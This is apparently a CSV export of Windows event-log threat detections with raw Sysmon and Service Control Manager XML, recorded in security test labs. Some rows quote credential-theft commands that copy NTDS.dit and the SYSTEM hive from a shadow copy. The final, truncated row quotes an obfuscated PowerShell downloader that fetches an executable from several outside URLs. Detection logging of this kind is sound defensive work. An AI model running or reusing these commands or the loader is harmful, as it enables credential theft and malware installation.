"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:50.764089Z"">
</TimeCreated>
<EventRecordID>4135</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:50.383</Data>
<Data Name=""ProcessGuid"">747F3D96-DDB6-5D31-0000-0010273D4C00</Data>
<Data Name=""ProcessId"">3952</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-0020FF090500</Data>
<Data Name=""LogonId"">0x509ff</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4A4-5D31-0000-0010DD6D0000</Data>
<Data Name=""ParentProcessId"">804</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:50.764089Z"">
</TimeCreated>
<EventRecordID>4135</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:50.383</Data>
<Data Name=""ProcessGuid"">747F3D96-DDB6-5D31-0000-0010273D4C00</Data>
<Data Name=""ProcessId"">3952</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-0020FF090500</Data>
<Data Name=""LogonId"">0x509ff</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4A4-5D31-0000-0010DD6D0000</Data>
<Data Name=""ParentProcessId"">804</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.258254,2019-07-19T19:11:27.258254+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:27.233257Z"">
</TimeCreated>
<EventRecordID>4133</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:27.220</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-001041504B00</Data>
<Data Name=""ProcessId"">6508</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.233257,2019-07-19T19:11:27.233257+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:27.202862Z"">
</TimeCreated>
<EventRecordID>4132</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:27.192</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-00102D4D4B00</Data>
<Data Name=""ProcessId"">976</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.202862,2019-07-19T19:11:27.202862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:27.169217Z"">
</TimeCreated>
<EventRecordID>4131</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:27.156</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-00101A4A4B00</Data>
<Data Name=""ProcessId"">5772</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.169217,2019-07-19T19:11:27.169217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:27.082080Z"">
</TimeCreated>
<EventRecordID>4130</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:27.069</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9F-5D31-0000-00107B454B00</Data>
<Data Name=""ProcessId"">3344</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Service installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Audit,High,"Service installed in the system with Name ( WinPwnage ) , File Name ( %COMSPEC% /c ping -n 1 127.0.0.1 &gt;nul &amp;&amp; echo &apos;WinPwnage&apos; &gt; \\.\pipe\WinPwnagePipe ) , Service Type ( user mode service ) , Service Start Type ( demand start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
</Provider>
<EventID Qualifiers=""16384"">7045</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T12:52:43.702578Z"">
</TimeCreated>
<EventRecordID>10446</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""468"" ThreadID=""3256"">
</Execution>
<Channel>System</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-21-3583694148-1414552638-2922671848-1000"">
</Security>
</System>
<EventData>
<Data Name=""ServiceName"">WinPwnage</Data>
<Data Name=""ImagePath"">%COMSPEC% /c ping -n 1 127.0.0.1 &gt;nul &amp;&amp; echo &apos;WinPwnage&apos; &gt; \\.\pipe\WinPwnagePipe</Data>
<Data Name=""ServiceType"">user mode service</Data>
<Data Name=""StartType"">demand start</Data>
<Data Name=""AccountName"">LocalSystem</Data>
</EventData>
</Event>",IEWIN7,System
cobalt strike service detected installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Threat,Critical,cobalt strike or meterpreter service detected installed in the system,7045,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
</Provider>
<EventID Qualifiers=""16384"">7045</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T12:52:43.702578Z"">
</TimeCreated>
<EventRecordID>10446</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""468"" ThreadID=""3256"">
</Execution>
<Channel>System</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-21-3583694148-1414552638-2922671848-1000"">
</Security>
</System>
<EventData>
<Data Name=""ServiceName"">WinPwnage</Data>
<Data Name=""ImagePath"">%COMSPEC% /c ping -n 1 127.0.0.1 &gt;nul &amp;&amp; echo &apos;WinPwnage&apos; &gt; \\.\pipe\WinPwnagePipe</Data>
<Data Name=""ServiceType"">user mode service</Data>
<Data Name=""StartType"">demand start</Data>
<Data Name=""AccountName"">LocalSystem</Data>
</EventData>
</Event>",IEWIN7,System
Service installed in the system,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,"Service installed in the system with Name ( remotesvc ) , File Name ( calc.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
</Provider>
<EventID Qualifiers=""16384"">7045</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T00:41:29.008933Z"">
</TimeCreated>
<EventRecordID>6045</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2308"">
</Execution>
<Channel>System</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-500"">
</Security>
</System>
<EventData>
<Data Name=""ServiceName"">remotesvc</Data>
<Data Name=""ImagePath"">calc.exe</Data>
<Data Name=""ServiceType"">user mode service</Data>
<Data Name=""StartType"">auto start</Data>
<Data Name=""AccountName"">LocalSystem</Data>
</EventData>
</Event>",WIN-77LTAPHIQ1R.example.corp,System
System Logs Cleared,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,System Logs Cleared,104,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>104</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T23:34:25.894341Z"">
</TimeCreated>
<EventRecordID>27736</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""812"" ThreadID=""3916"">
</Execution>
<Channel>System</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-1106"">
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserName>user01</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<Channel>System</Channel>
<BackupPath></BackupPath>
</LogFileCleared>
</UserData>
</Event>",PC01.example.corp,System
Service installed in the system,1551605354.168476,2019-03-03T13:29:14.168476+04:00,,Audit,High,"Service installed in the system with Name ( spoolsv ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
</Provider>
<EventID Qualifiers=""16384"">7045</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-03T09:24:24.699653Z"">
</TimeCreated>
<EventRecordID>4482</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2024"">
</Execution>
<Channel>System</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-1108"">
</Security>
</System>
<EventData>
<Data Name=""ServiceName"">spoolsv</Data>
<Data Name=""ImagePath"">cmd.exe</Data>
<Data Name=""ServiceType"">user mode service</Data>
<Data Name=""StartType"">auto start</Data>
<Data Name=""AccountName"">LocalSystem</Data>
</EventData>
</Event>",WIN-77LTAPHIQ1R.example.corp,System
Service installed in the system,1551605038.85688,2019-03-03T13:23:58.856880+04:00,,Audit,High,"Service installed in the system with Name ( spoolfool ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Service Control Manager"" Guid=""{555908d1-a6d7-4695-8e1e-26931d2012f4}"" EventSourceName=""Service Control Manager"">
</Provider>
<EventID Qualifiers=""16384"">7045</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8080000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-03T09:20:28.621489Z"">
</TimeCreated>
<EventRecordID>4480</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""140"">
</Execution>
<Channel>System</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security UserID=""S-1-5-21-1587066498-1489273250-1035260531-1108"">
</Security>
</System>
<EventData>
<Data Name=""ServiceName"">spoolfool</Data>
<Data Name=""ImagePath"">cmd.exe</Data>
<Data Name=""ServiceType"">user mode service</Data>
<Data Name=""StartType"">auto start</Data>
<Data Name=""AccountName"">LocalSystem</Data>
</EventData>
</Event>",WIN-77LTAPHIQ1R.example.corp,System
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.34971,2020-08-26T09:09:33.349710+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&ap